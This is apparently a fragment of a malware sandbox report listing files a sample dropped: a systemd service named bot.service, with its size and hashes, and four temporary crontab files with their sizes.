                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/lib/systemd/system/bot.service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            193B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            a3e1220eacdbd3fa5d0117efd5d4dd91

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            b66492d74a517bcd9d230b574b56411476124709

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            05d02411668f4ebd576a24ac61cc84e617bdb66aa819581daa670c65f1a876f0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            78d27f45518a7fce636ef790ee215b1f47b2939e02cf6c5118897a703cc15ed4c283838d30a275e309304415d2a58e2e4a07d99127ec9ff32221d94e6547ca1f

  • /var/spool/cron/crontabs/tmp.DXakxk

    Filesize

    175B


  • /var/spool/cron/crontabs/tmp.OuaeaC

    Filesize

    250B


  • /var/spool/cron/crontabs/tmp.T1CvWV

    Filesize

    175B


  • /var/spool/cron/crontabs/tmp.kWCF4d

    Filesize

    175B
